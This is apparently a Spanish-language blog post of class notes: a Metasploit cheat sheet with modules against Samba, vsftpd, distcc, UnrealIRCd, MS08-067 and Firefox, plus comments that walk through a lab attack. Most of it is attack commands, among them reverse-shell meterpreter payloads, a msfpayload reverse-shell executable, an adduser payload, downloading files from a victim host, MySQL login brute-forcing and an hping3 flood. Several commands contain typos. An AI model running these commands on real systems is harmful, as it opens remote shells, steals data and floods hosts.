Herramienta: minidwep
Para obtener SSID oculto, se bede tipear en el terminal: besside-ng -b MAC mon0
Bsucar puertos: nmap -sS -sV rango ip, o ip especifica (192.168.10.0/24, 192.168.10.0-224)
Ataque Linux
- Samba – Netbios:
- search samba
- use exploit/multi/samba/usermap_script
- set payload cmd/unix/reverse
- Otro: search osvdb:73573
- use exploit/unix/ftp/vsftpd_234_backdoor
- set payload amd/unix/intercat
- search distcc
- use exploit/unix/misc/distcc_exec
- search irc o unreal
- use exploit/unix/irc/unreal_irc_3281_backdoor
- XP
- search ms08-067
- use expoit/windows/smb/·.....
- set payload windows/meterpreter/reverse_tcp, (windows/shell/reverse_tcp)
- show options
- set LHOST ip atacante
- set RHOST victima exploit
- VNC: set payload windows/vncinject/reverse_tcp exploit
- set payload windows/adduser
- set USER nombre usuario
- set PASS pasword
- WINDOWS 7
- msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 x > /root/Desktop/exploit.exe -> se crea en el escritorio copiar esto a windows
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- show options
- set LHOST 192.168.1.2
- exploit
- OTRO:
- use exploit /multi/browser/firefox_xpi_bootstrap_addon
- set PAYLOAD windows/meterpreter/reverse_tcp
- set SRVHOST (maquina del atacante)
- set URIPATH / exploit show options
- hping3 -p80 -s --flood ip_victima
Mijin estas ahi confirma... con un coment
ResponderEliminarpon esto
ResponderEliminarset payload windows/meterpreter/reverse_tcp, (windows/shell/reverse_tcp)
set LHOST tu_ip
set RHOST 192.168.1.113
y pones exploit
ResponderEliminarmeterpreter> shell --> te abre una terminal de windows
ResponderEliminarde ahi buscas el archivo en el escritorio, esta bajo Documents and Settings ahi buscas el user y esta en scritorio
para bajar el archivo sales del shell--> CTRL+C
ResponderEliminary de ahi pones download path_de_windows_del_archivo
el archivo se baja en /root
de ahi sales de ese exploit -->exit para salir del meterpreter--> back para volver al msf>
ResponderEliminarAqui das esto: use auxiliary/scanner/mysql/mysql_login
De ahi set RHOSTS 192.168.1.183
Despues le das show options y ves las opciones y das
set USERNAME ruta del archivo que te bajaste de windows
PASS_FILE ruta del archivo que te bajaste de windows, fíjate algo parecido no recordamos, algo como file y user en el show options ves
ejecutas el exploit y te sale 2 succesfull, pero ahi ya le muestras al profe
ResponderEliminar